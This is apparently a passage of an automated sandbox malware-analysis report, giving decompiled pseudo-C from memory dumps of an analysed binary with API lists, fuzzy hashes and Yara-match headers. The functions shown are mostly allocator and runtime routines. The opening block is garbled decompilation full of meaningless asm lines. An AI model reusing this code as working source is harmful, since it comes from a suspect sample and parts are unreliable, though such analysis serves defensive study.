                    						 *((intOrPtr*)(_t41 + _t41 * 8 - 0x3fcdfc8b)) =  *((intOrPtr*)(_t41 + _t41 * 8 - 0x3fcdfc8b)) + _t41;
                    					} else {
                    						asm("o16 aas");
                    						_t41 = _t41 + _t51 + _t48;
                    						_push(0x3f);
                    						 *0x53013f6f =  *0x53013f6f + _t48;
                    						if( *0x53013f6f >= 0) {
                    							_pop(es);
                    						} else {
                    							 *_t49 =  *_t49 + _t52;
                    							asm("o16 aas");
                    							 *((intOrPtr*)(_t49 + 0x6a)) =  *((intOrPtr*)(_t49 + 0x6a)) + _t41;
                    							asm("aas");
                    							 *((intOrPtr*)(_t54 - 0x43fec092)) =  *((intOrPtr*)(_t54 - 0x43fec092)) + _t41;
                    							goto L7;
                    						}
                    					}
                    				} else {
                    					 *((intOrPtr*)(__edi + 0x76)) =  *((intOrPtr*)(__edi + 0x76)) + 0x69;
                    					asm("aas");
                    					 *0x35013f69 =  *0x35013f69 + _t55;
                    					asm("insd");
                    					asm("aas");
                    					 *((intOrPtr*)(__edx + 0x71)) =  *((intOrPtr*)(__edx + 0x71)) + __edi;
                    					asm("aas");
                    					 *0xFFFFFFFF96013FDE =  *((intOrPtr*)(0xffffffff96013fde)) + __esi;
                    					_push(0x6c9d013f);
                    					asm("aas");
                    					_t51 = __edx + _t57;
                    					if(_t51 < 0) {
                    						L7:
                    						asm("aas");
                    						 *((intOrPtr*)(_t51 + 0x65a2013f + _t54 * 2)) =  *((intOrPtr*)(_t51 + 0x65a2013f + _t54 * 2)) + _t52;
                    						goto L8;
                    					} else {
                    						 *__ecx =  *__ecx + __ebx;
                    						if( *__ecx != 0) {
                    							L8:
                    							asm("aas");
                    						} else {
                    							_t54 = __esi + __edi;
                    							asm("a16 aas");
                    							 *_t54 =  *_t54 + 0x69;
                    							asm("insb");
                    							asm("aas");
                    							 *((intOrPtr*)(__ebx + 0x70)) =  *((intOrPtr*)(__ebx + 0x70)) + __ecx;
                    							asm("aas");
                    							 *((intOrPtr*)(__ecx + 0x67013f74)) =  *((intOrPtr*)(__ecx + 0x67013f74)) + 0x69;
                    							asm("a16 aas");
                    							 *((intOrPtr*)(__edi + 0x6b)) =  *((intOrPtr*)(__edi + 0x6b)) + _t55;
                    							asm("aas");
                    							 *((intOrPtr*)(__edi + 0x73ea013f + _t55 * 2)) =  *((intOrPtr*)(__edi + 0x73ea013f + _t55 * 2)) + _t54;
                    							goto L4;
                    						}
                    					}
                    				}
                    			}

                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 82%
                    			E01403A83(signed int __eax, void* __ecx) {
                    				signed int _t2;
                    				signed int _t3;
                    				int _t10;
                    				int _t11;
                    				void* _t13;
                    				short** _t16;
                    				char* _t19;
                    				void* _t20;
                    
                    				_t13 = __ecx;
                    				_t16 =  *0x143a614; // 0x0
                    				if(_t16 != 0) {
                    					_t10 = 0;
                    					while( *_t16 != _t10) {
                    						_t2 = WideCharToMultiByte(_t10, _t10,  *_t16, 0xffffffff, _t10, _t10, _t10, _t10);
                    						_t11 = _t2;
                    						if(_t11 == 0) {
                    							L11:
                    							_t3 = _t2 | 0xffffffff;
                    						} else {
                    							_t19 = E014009B2(_t13, _t11, 1);
                    							_pop(_t13);
                    							if(_t19 == 0) {
                    								L10:
                    								_t2 = E014012E1(_t19);
                    								goto L11;
                    							} else {
                    								_t10 = 0;
                    								if(WideCharToMultiByte(0, 0,  *_t16, 0xffffffff, _t19, _t11, 0, 0) == 0) {
                    									goto L10;
                    								} else {
                    									_push(0);
                    									_push(_t19);
                    									E0140D7A1();
                    									E014012E1(0);
                    									_t20 = _t20 + 0xc;
                    									_t16 =  &(_t16[1]);
                    									continue;
                    								}
                    							}
                    						}
                    						L9:
                    						return _t3;
                    						goto L12;
                    					}
                    					_t3 = 0;
                    					goto L9;
                    				} else {
                    					return __eax | 0xffffffff;
                    				}
                    				L12:
                    			}

                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 95%
                    			E01406D17(signed int _a4) {
                    				signed int _t9;
                    				void* _t13;
                    				signed int _t15;
                    				WCHAR* _t22;
                    				signed int _t24;
                    				signed int* _t25;
                    				void* _t27;
                    
                    				_t9 = _a4;
                    				_t25 = 0x143a668 + _t9 * 4;
                    				_t24 =  *_t25;
                    				if(_t24 == 0) {
                    					_t22 =  *(0x1423cb0 + _t9 * 4);
                    					_t27 = LoadLibraryExW(_t22, 0, 0x800);
                    					if(_t27 != 0) {
                    						L8:
                    						 *_t25 = _t27;
                    						if( *_t25 != 0) {
                    							FreeLibrary(_t27);
                    						}
                    						_t13 = _t27;
                    						L11:
                    						return _t13;
                    					}
                    					_t15 = GetLastError();
                    					if(_t15 != 0x57) {
                    						_t27 = 0;
                    					} else {
                    						_t15 = LoadLibraryExW(_t22, _t27, _t27);
                    						_t27 = _t15;
                    					}
                    					if(_t27 != 0) {
                    						goto L8;
                    					} else {
                    						 *_t25 = _t15 | 0xffffffff;
                    						_t13 = 0;
                    						goto L11;
                    					}
                    				}
                    				_t4 = _t24 + 1; // 0x78d9f93a
                    				asm("sbb eax, eax");
                    				return  ~_t4 & _t24;
                    			}

                    APIs
                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000008,00000000,00000000,?,01406CBE,00000008,00000000,00000000,00000000,?,01406F9C,00000006,FlsSetValue), ref: 01406D49
                    • GetLastError.KERNEL32(?,01406CBE,00000008,00000000,00000000,00000000,?,01406F9C,00000006,FlsSetValue,0142418C,01424194,00000000,00000364,?,01406AD3), ref: 01406D55
                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,01406CBE,00000008,00000000,00000000,00000000,?,01406F9C,00000006,FlsSetValue,0142418C,01424194,00000000), ref: 01406D63
                    Similarity
                    • API ID: LibraryLoad$ErrorLast
                    • API String ID: 3177248105-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • ___BuildCatchObject.LIBVCRUNTIME ref: 013F3D1C
                      • Part of subcall function 013F4354: ___AdjustPointer.LIBCMT ref: 013F439E
                    • _UnwindNestedFrames.LIBCMT ref: 013F3D33
                    • ___FrameUnwindToState.LIBVCRUNTIME ref: 013F3D45
                    • CallCatchBlock.LIBVCRUNTIME ref: 013F3D69
                    Similarity
                    • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                    • API String ID: 2633735394-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 71%
                    			E013EC3A0(void* __ebx, void* __edx, signed char _a4, signed int _a8) {
                    				intOrPtr _v8;
                    				char _v16;
                    				intOrPtr _v20;
                    				intOrPtr _v28;
                    				signed char _v32;
                    				void* __esi;
                    				signed int _t83;
                    				signed int _t88;
                    				signed int _t93;
                    				signed char _t98;
                    				signed int _t104;
                    				signed int _t110;
                    				signed int _t117;
                    				signed int _t121;
                    				signed int _t137;
                    				void* _t138;
                    				signed char _t152;
                    				signed char _t156;
                    				void* _t158;
                    				signed int _t160;
                    				signed int _t163;
                    				signed int _t165;
                    				signed int _t168;
                    				signed int _t169;
                    				signed int _t172;
                    				void* _t173;
                    				signed char _t174;
                    				signed int _t178;
                    				signed char _t179;
                    				signed char _t180;
                    				signed int _t181;
                    				void* _t199;
                    				signed int _t201;
                    				signed int _t204;
                    				signed char _t213;
                    				signed int _t218;
                    				intOrPtr _t222;
                    				signed int _t228;
                    				signed int _t229;
                    				signed int _t234;
                    
                    				_t199 = __edx;
                    				_t173 = __ebx;
                    				_t83 = _a4;
                    				if(_t83 != 0) {
                    					__eflags = _t83 - 0x3ffffff;
                    					if(__eflags > 0) {
                    						E013F3465(__eflags);
                    						goto L10;
                    					} else {
                    						_t169 = _t83 << 6;
                    						__eflags = _t169 - 0x1000;
                    						if(__eflags < 0) {
                    							_t83 = E013F21A5(__eflags, _t169);
                    							_t234 = _t234 + 4;
                    							__eflags = _t83;
                    							if(__eflags != 0) {
                    								goto L1;
                    							} else {
                    								goto L12;
                    							}
                    						} else {
                    							_t2 = _t169 + 0x23; // 0x23
                    							_t177 = _t2;
                    							__eflags = _t2 - _t169;
                    							if(__eflags <= 0) {
                    								L10:
                    								E013F3465(__eflags);
                    								goto L11;
                    							} else {
                    								_t177 = E013F21A5(__eflags, _t177);
                    								_t234 = _t234 + 4;
                    								__eflags = _t177;
                    								if(__eflags == 0) {
                    									L11:
                    									E013FDA71(_t173, _t177, _t199, __eflags);
                    									L12:
                    									E013FDA71(_t173, _t177, _t199, __eflags);
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									_t88 = _a4;
                    									__eflags = _t88;
                    									if(_t88 != 0) {
                    										__eflags = _t88 - 0x15555555;
                    										if(__eflags > 0) {
                    											E013F3465(__eflags);
                    											goto L23;
                    										} else {
                    											_t165 = _t88 + _t88 * 2 << 2;
                    											__eflags = _t165 - 0x1000;
                    											if(__eflags < 0) {
                    												_t88 = E013F21A5(__eflags, _t165);
                    												_t234 = _t234 + 4;
                    												__eflags = _t88;
                    												if(__eflags != 0) {
                    													goto L14;
                    												} else {
                    													goto L25;
                    												}
                    											} else {
                    												_t8 = _t165 + 0x23; // 0x23
                    												_t177 = _t8;
                    												__eflags = _t8 - _t165;
                    												if(__eflags <= 0) {
                    													L23:
                    													E013F3465(__eflags);
                    													goto L24;
                    												} else {
                    													_t177 = E013F21A5(__eflags, _t177);
                    													_t234 = _t234 + 4;
                    													__eflags = _t177;
                    													if(__eflags == 0) {
                    														L24:
                    														E013FDA71(_t173, _t177, _t199, __eflags);
                    														L25:
                    														E013FDA71(_t173, _t177, _t199, __eflags);
                    														asm("int3");
                    														asm("int3");
                    														asm("int3");
                    														asm("int3");
                    														asm("int3");
                    														asm("int3");
                    														asm("int3");
                    														asm("int3");
                    														asm("int3");
                    														asm("int3");
                    														asm("int3");
                    														asm("int3");
                    														_t93 = _a4;
                    														__eflags = _t93;
                    														if(_t93 != 0) {
                    															__eflags = _t93 - 0xaaaaaaa;
                    															if(__eflags > 0) {
                    																E013F3465(__eflags);
                    																goto L36;
                    															} else {
                    																_t160 = _t93 + _t93 * 2 << 3;
                    																__eflags = _t160 - 0x1000;
                    																if(__eflags < 0) {
                    																	_t93 = E013F21A5(__eflags, _t160);
                    																	_t234 = _t234 + 4;
                    																	__eflags = _t93;
                    																	if(__eflags != 0) {
                    																		goto L27;
                    																	} else {
                    																		goto L38;
                    																	}
                    																} else {
                    																	_t177 = _t160 + 0x23;
                    																	__eflags = _t160 + 0x23 - _t160;
                    																	if(__eflags <= 0) {
                    																		L36:
                    																		E013F3465(__eflags);
                    																		goto L37;
                    																	} else {
                    																		_t177 = E013F21A5(__eflags, _t177);
                    																		_t234 = _t234 + 4;
                    																		__eflags = _t177;
                    																		if(__eflags == 0) {
                    																			L37:
                    																			E013FDA71(_t173, _t177, _t199, __eflags);
                    																			L38:
                    																			E013FDA71(_t173, _t177, _t199, __eflags);
                    																			asm("int3");
                    																			asm("int3");
                    																			asm("int3");
                    																			asm("int3");
                    																			asm("int3");
                    																			asm("int3");
                    																			asm("int3");
                    																			asm("int3");
                    																			asm("int3");
                    																			asm("int3");
                    																			asm("int3");
                    																			asm("int3");
                    																			_t178 = _a8;
                    																			_t98 = _a4;
                    																			__eflags = _t178 - 0x3ffffff;
                    																			if(__eflags > 0) {
                    																				E013FDA71(_t173, _t178, _t199, __eflags);
                    																				goto L48;
                    																			} else {
                    																				_t178 = _t178 << 6;
                    																				__eflags = _t178 - 0x1000;
                    																				if(_t178 < 0x1000) {
                    																					L46:
                    																					return L013CDA60(_t98);
                    																				} else {
                    																					__eflags = _t98 & 0x0000001f;
                    																					if(__eflags != 0) {
                    																						L48:
                    																						E013FDA71(_t173, _t178, _t199, __eflags);
                    																						goto L49;
                    																					} else {
                    																						_t178 =  *(_t98 - 4);
                    																						__eflags = _t178 - _t98;
                    																						if(__eflags >= 0) {
                    																							L49:
                    																							E013FDA71(_t173, _t178, _t199, __eflags);
                    																							goto L50;
                    																						} else {
                    																							_t158 = _t98 - _t178;
                    																							__eflags = _t158 - 4;
                    																							if(__eflags < 0) {
                    																								L50:
                    																								E013FDA71(_t173, _t178, _t199, __eflags);
                    																								goto L51;
                    																							} else {
                    																								__eflags = _t158 - 0x23;
                    																								if(__eflags > 0) {
                    																									L51:
                    																									E013FDA71(_t173, _t178, _t199, __eflags);
                    																									asm("int3");
                    																									asm("int3");
                    																									asm("int3");
                    																									asm("int3");
                    																									asm("int3");
                    																									asm("int3");
                    																									asm("int3");
                    																									asm("int3");
                    																									asm("int3");
                    																									_t104 = _a8;
                    																									_t179 = _a4;
                    																									__eflags = _t104 - 0x15555555;
                    																									if(__eflags > 0) {
                    																										E013FDA71(_t173, _t179, _t199, __eflags);
                    																										goto L61;
                    																									} else {
                    																										__eflags = _t104 + _t104 * 2 << 2 - 0x1000;
                    																										if(_t104 + _t104 * 2 << 2 < 0x1000) {
                    																											L59:
                    																											return L013CDA60(_t179);
                    																										} else {
                    																											__eflags = _t179 & 0x0000001f;
                    																											if(__eflags != 0) {
                    																												L61:
                    																												E013FDA71(_t173, _t179, _t199, __eflags);
                    																												goto L62;
                    																											} else {
                    																												_t156 =  *(_t179 - 4);
                    																												__eflags = _t156 - _t179;
                    																												if(__eflags >= 0) {
                    																													L62:
                    																													E013FDA71(_t173, _t179, _t199, __eflags);
                    																													goto L63;
                    																												} else {
                    																													_t179 = _t179 - _t156;
                    																													__eflags = _t179 - 4;
                    																													if(__eflags < 0) {
                    																														L63:
                    																														E013FDA71(_t173, _t179, _t199, __eflags);
                    																														goto L64;
                    																													} else {
                    																														__eflags = _t179 - 0x23;
                    																														if(__eflags > 0) {
                    																															L64:
                    																															E013FDA71(_t173, _t179, _t199, __eflags);
                    																															asm("int3");
                    																															asm("int3");
                    																															asm("int3");
                    																															asm("int3");
                    																															asm("int3");
                    																															asm("int3");
                    																															asm("int3");
                    																															_t110 = _a8;
                    																															_t180 = _a4;
                    																															__eflags = _t110 - 0xaaaaaaa;
                    																															if(__eflags > 0) {
                    																																E013FDA71(_t173, _t180, _t199, __eflags);
                    																																goto L74;
                    																															} else {
                    																																__eflags = _t110 + _t110 * 2 << 3 - 0x1000;
                    																																if(_t110 + _t110 * 2 << 3 < 0x1000) {
                    																																	L72:
                    																																	return L013CDA60(_t180);
                    																																} else {
                    																																	__eflags = _t180 & 0x0000001f;
                    																																	if(__eflags != 0) {
                    																																		L74:
                    																																		E013FDA71(_t173, _t180, _t199, __eflags);
                    																																		goto L75;
                    																																	} else {
                    																																		_t152 =  *(_t180 - 4);
                    																																		__eflags = _t152 - _t180;
                    																																		if(__eflags >= 0) {
                    																																			L75:
                    																																			E013FDA71(_t173, _t180, _t199, __eflags);
                    																																			goto L76;
                    																																		} else {
                    																																			_t180 = _t180 - _t152;
                    																																			__eflags = _t180 - 4;
                    																																			if(__eflags < 0) {
                    																																				L76:
                    																																				E013FDA71(_t173, _t180, _t199, __eflags);
                    																																				goto L77;
                    																																			} else {
                    																																				__eflags = _t180 - 0x23;
                    																																				if(__eflags > 0) {
                    																																					L77:
                    																																					E013FDA71(_t173, _t180, _t199, __eflags);
                    																																					asm("int3");
                    																																					asm("int3");
                    																																					asm("int3");
                    																																					asm("int3");
                    																																					asm("int3");
                    																																					asm("int3");
                    																																					asm("int3");
                    																																					_t231 = _t234;
                    																																					_push(0xffffffff);
                    																																					_push(E01418180);
                    																																					_push( *[fs:0x0]);
                    																																					_push(_t173);
                    																																					_t117 =  *0x1435234; // 0x78d9f939
                    																																					_push(_t117 ^ _t234);
                    																																					 *[fs:0x0] =  &_v16;
                    																																					_v20 = _t234 - 0x10;
                    																																					_t174 = _t180;
                    																																					_v32 = _t174;
                    																																					_t181 =  *(_t174 + 4);
                    																																					_t213 = _a4;
                    																																					_t201 = _t181 -  *_t174;
                    																																					_t121 = 0x2aaaaaab * _t201;
                    																																					_t222 = (0x2aaaaaab * _t201 >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * _t201 >> 0x20 >> 2);
                    																																					_v28 = _t222;
                    																																					__eflags = _t222 - _t213;
                    																																					if(__eflags <= 0) {
                    																																						if(__eflags >= 0) {
                    																																							goto L84;
                    																																						} else {
                    																																							_t204 = _a8;
                    																																							__eflags = _t204 - _t181;
                    																																							if(_t204 >= _t181) {
                    																																								L89:
                    																																								__eflags = _t213 - _t222;
                    																																								E013EC250(_t174, _t174, _t222, _t231, _t213 - _t222);
                    																																							} else {
                    																																								_t138 =  *_t174;
                    																																								__eflags = _t138 - _t204;
                    																																								if(_t138 > _t204) {
                    																																									goto L89;
                    																																								} else {
                    																																									_t228 = (0x2aaaaaab * (_t204 - _t138) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_t204 - _t138) >> 0x20 >> 2);
                    																																									E013EC250(_t174, _t174, _t228, _t231, _t213 - _v28);
                    																																									_a8 =  *_t174 + (_t228 + _t228 * 2) * 8;
                    																																								}
                    																																							}
                    																																							_push(_a8);
                    																																							_v8 = 0;
                    																																							_push(_t174);
                    																																							E013EABB0( *(_t174 + 4), _t213 - (0x2aaaaaab * ( *(_t174 + 4) -  *_t174) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * ( *(_t174 + 4) -  *_t174) >> 0x20 >> 2), _a8);
                    																																							_t137 = _t213 - (0x2aaaaaab * ( *(_t174 + 4) -  *_t174) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * ( *(_t174 + 4) -  *_t174) >> 0x20 >> 2) + (_t213 - (0x2aaaaaab * ( *(_t174 + 4) -  *_t174) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * ( *(_t174 + 4) -  *_t174) >> 0x20 >> 2)) * 2 << 3;
                    																																							_t80 = _t174 + 4;
                    																																							 *_t80 =  *(_t174 + 4) + _t137;
                    																																							__eflags =  *_t80;
                    																																							 *[fs:0x0] = _v16;
                    																																							return _t137;
                    																																						}
                    																																					} else {
                    																																						_t121 = _t181 + (_t213 - _t222 + (_t213 - _t222) * 2) * 8;
                    																																						_a8 = _t121;
                    																																						_t229 = _t121;
                    																																						__eflags = _t121 - _t181;
                    																																						if(_t121 != _t181) {
                    																																							_t218 = _t181;
                    																																							do {
                    																																								 *((intOrPtr*)( *_t229))(0);
                    																																								_t229 = _t229 + 0x18;
                    																																								__eflags = _t229 - _t218;
                    																																							} while (_t229 != _t218);
                    																																							_t121 = _a8;
                    																																						}
                    																																						 *(_t174 + 4) = _t121;
                    																																						L84:
                    																																						 *[fs:0x0] = _v16;
                    																																						return _t121;
                    																																					}
                    																																				} else {
                    																																					_t180 = _t152;
                    																																					goto L72;
                    																																				}
                    																																			}
                    																																		}
                    																																	}
                    																																}
                    																															}
                    																														} else {
                    																															_t179 = _t156;
                    																															goto L59;
                    																														}
                    																													}
                    																												}
                    																											}
                    																										}
                    																									}
                    																								} else {
                    																									_t98 = _t178;
                    																									goto L46;
                    																								}
                    																							}
                    																						}
                    																					}
                    																				}
                    																			}
                    																		} else {
                    																			_t163 = _t177 + 0x00000023 & 0xffffffe0;
                    																			__eflags = _t163;
                    																			 *(_t163 - 4) = _t177;
                    																			return _t163;
                    																		}
                    																	}
                    																}
                    															}
                    														} else {
                    															L27:
                    															return _t93;
                    														}
                    													} else {
                    														_t9 = _t177 + 0x23; // 0x23
                    														_t168 = _t9 & 0xffffffe0;
                    														__eflags = _t168;
                    														 *(_t168 - 4) = _t177;
                    														return _t168;
                    													}
                    												}
                    											}
                    										}
                    									} else {
                    										L14:
                    										return _t88;
                    									}
                    								} else {
                    									_t3 = _t177 + 0x23; // 0x23
                    									_t172 = _t3 & 0xffffffe0;
                    									__eflags = _t172;
                    									 *(_t172 - 4) = _t177;
                    									return _t172;
                    								}
                    							}
                    						}
                    					}
                    				} else {
                    					L1:
                    					return _t83;
                    				}
                    			}

                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Similarity
                    • Opcode ID: db2e6d724a65768649ffc4e33d32ffbd3b2d2ce27da2207b0f177cd2ae6e7a41
                    • Instruction ID: e187e9d28f48d552988b9cfe2c56299318a0b69c14fd7f4ab446558d0d338ed6
                    • Opcode Fuzzy Hash: db2e6d724a65768649ffc4e33d32ffbd3b2d2ce27da2207b0f177cd2ae6e7a41
                    • Instruction Fuzzy Hash: 46F05CF594031245FB29AB7C840C55E71C88F3025D7005A3DD736D11D0EB2CCA548117
                    Uniqueness Score: -1.00%
                    C-Code - Quality: 70%
                    			E013E2C10(void* __ebx, void* __edx, void* __ebp, signed char _a4, signed int _a8) {
                    				intOrPtr _v4;
                    				char _v8;
                    				signed int _t17;
                    				signed int _t22;
                    				signed char _t33;
                    				signed int _t34;
                    				signed int _t37;
                    				void* _t38;
                    				signed char _t40;
                    				intOrPtr* _t41;
                    				void* _t43;
                    				signed char _t45;
                    				void* _t48;
                    
                    				_t43 = __edx;
                    				_t38 = __ebx;
                    				_t17 = _a4;
                    				if(_t17 != 0) {
                    					__eflags = _t17 - 0x3fffffff;
                    					if(__eflags > 0) {
                    						E013F3465(__eflags);
                    						goto L10;
                    					} else {
                    						_t34 = _t17 << 2;
                    						__eflags = _t34 - 0x1000;
                    						if(__eflags < 0) {
                    							_t17 = E013F21A5(__eflags, _t34);
                    							_t48 = _t48 + 4;
                    							__eflags = _t17;
                    							if(__eflags != 0) {
                    								goto L1;
                    							} else {
                    								goto L12;
                    							}
                    						} else {
                    							_t39 = _t34 + 0x23;
                    							__eflags = _t34 + 0x23 - _t34;
                    							if(__eflags <= 0) {
                    								L10:
                    								E013F3465(__eflags);
                    								goto L11;
                    							} else {
                    								_t39 = E013F21A5(__eflags, _t39);
                    								_t48 = _t48 + 4;
                    								__eflags = _t39;
                    								if(__eflags == 0) {
                    									L11:
                    									E013FDA71(_t38, _t39, _t43, __eflags);
                    									L12:
                    									E013FDA71(_t38, _t39, _t43, __eflags);
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									_t22 = _a8;
                    									_t40 = _a4;
                    									__eflags = _t22 - 0x3fffffff;
                    									if(__eflags > 0) {
                    										E013FDA71(_t38, _t40, _t43, __eflags);
                    										goto L22;
                    									} else {
                    										__eflags = _t22 << 2 - 0x1000;
                    										if(_t22 << 2 < 0x1000) {
                    											L20:
                    											return L013CDA60(_t40);
                    										} else {
                    											__eflags = _t40 & 0x0000001f;
                    											if(__eflags != 0) {
                    												L22:
                    												E013FDA71(_t38, _t40, _t43, __eflags);
                    												goto L23;
                    											} else {
                    												_t33 =  *(_t40 - 4);
                    												__eflags = _t33 - _t40;
                    												if(__eflags >= 0) {
                    													L23:
                    													E013FDA71(_t38, _t40, _t43, __eflags);
                    													goto L24;
                    												} else {
                    													_t40 = _t40 - _t33;
                    													__eflags = _t40 - 4;
                    													if(__eflags < 0) {
                    														L24:
                    														E013FDA71(_t38, _t40, _t43, __eflags);
                    														goto L25;
                    													} else {
                    														__eflags = _t40 - 0x23;
                    														if(__eflags > 0) {
                    															L25:
                    															E013FDA71(_t38, _t40, _t43, __eflags);
                    															asm("int3");
                    															asm("int3");
                    															asm("int3");
                    															asm("int3");
                    															asm("int3");
                    															asm("int3");
                    															asm("int3");
                    															asm("int3");
                    															asm("int3");
                    															asm("int3");
                    															_t45 = _a4;
                    															_t41 = _t45 + 4;
                    															_v4 = 0;
                    															 *_t45 = 0x141ce3c;
                    															_v8 = 1;
                    															 *_t41 = 0;
                    															 *((intOrPtr*)(_t41 + 4)) = 0;
                    															 *((intOrPtr*)(_t41 + 8)) = 0;
                    															E013E29F0(_t41, 1,  &_v8);
                    															return _t45;
                    														} else {
                    															_t40 = _t33;
                    															goto L20;
                    														}
                    													}
                    												}
                    											}
                    										}
                    									}
                    								} else {
                    									_t3 = _t39 + 0x23; // 0x23
                    									_t37 = _t3 & 0xffffffe0;
                    									__eflags = _t37;
                    									 *(_t37 - 4) = _t39;
                    									return _t37;
                    								}
                    							}
                    						}
                    					}
                    				} else {
                    					L1:
                    					return _t17;
                    				}
                    			}

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 68033fc793f9f572c03a4ba0ce76aa5b62524bf5acb5f1e25c83716251330b5a
                    • Instruction ID: 8c333e0dc73dd7136ffc5d2438a97a526bf57dc34df9d91aa8e222bda39508d1
                    • Opcode Fuzzy Hash: 68033fc793f9f572c03a4ba0ce76aa5b62524bf5acb5f1e25c83716251330b5a
                    • Instruction Fuzzy Hash: 0DF020AA94031202FF29ABFCC84D61FA1CC4E3026C7000A3DE727C21D0EA24C8A5811B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 72%
                    			E013EC410(void* __ebx, void* __edx, signed char _a4, signed int _a8) {
                    				intOrPtr _v8;
                    				char _v16;
                    				intOrPtr _v20;
                    				intOrPtr _v28;
                    				signed char _v32;
                    				void* __esi;
                    				signed int _t79;
                    				signed int _t84;
                    				signed char _t89;
                    				signed int _t95;
                    				signed int _t101;
                    				signed int _t108;
                    				signed int _t112;
                    				signed int _t128;
                    				void* _t129;
                    				signed char _t143;
                    				signed char _t147;
                    				void* _t149;
                    				signed int _t151;
                    				signed int _t154;
                    				signed int _t156;
                    				signed int _t159;
                    				void* _t160;
                    				signed char _t161;
                    				signed int _t165;
                    				signed char _t166;
                    				signed char _t167;
                    				signed int _t168;
                    				void* _t186;
                    				signed int _t188;
                    				signed int _t191;
                    				signed char _t200;
                    				signed int _t205;
                    				intOrPtr _t209;
                    				signed int _t215;
                    				signed int _t216;
                    				signed int _t221;
                    
                    				_t186 = __edx;
                    				_t160 = __ebx;
                    				_t79 = _a4;
                    				if(_t79 != 0) {
                    					__eflags = _t79 - 0x15555555;
                    					if(__eflags > 0) {
                    						E013F3465(__eflags);
                    						goto L10;
                    					} else {
                    						_t156 = _t79 + _t79 * 2 << 2;
                    						__eflags = _t156 - 0x1000;
                    						if(__eflags < 0) {
                    							_t79 = E013F21A5(__eflags, _t156);
                    							_t221 = _t221 + 4;
                    							__eflags = _t79;
                    							if(__eflags != 0) {
                    								goto L1;
                    							} else {
                    								goto L12;
                    							}
                    						} else {
                    							_t4 = _t156 + 0x23; // 0x23
                    							_t164 = _t4;
                    							__eflags = _t4 - _t156;
                    							if(__eflags <= 0) {
                    								L10:
                    								E013F3465(__eflags);
                    								goto L11;
                    							} else {
                    								_t164 = E013F21A5(__eflags, _t164);
                    								_t221 = _t221 + 4;
                    								__eflags = _t164;
                    								if(__eflags == 0) {
                    									L11:
                    									E013FDA71(_t160, _t164, _t186, __eflags);
                    									L12:
                    									E013FDA71(_t160, _t164, _t186, __eflags);
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									_t84 = _a4;
                    									__eflags = _t84;
                    									if(_t84 != 0) {
                    										__eflags = _t84 - 0xaaaaaaa;
                    										if(__eflags > 0) {
                    											E013F3465(__eflags);
                    											goto L23;
                    										} else {
                    											_t151 = _t84 + _t84 * 2 << 3;
                    											__eflags = _t151 - 0x1000;
                    											if(__eflags < 0) {
                    												_t84 = E013F21A5(__eflags, _t151);
                    												_t221 = _t221 + 4;
                    												__eflags = _t84;
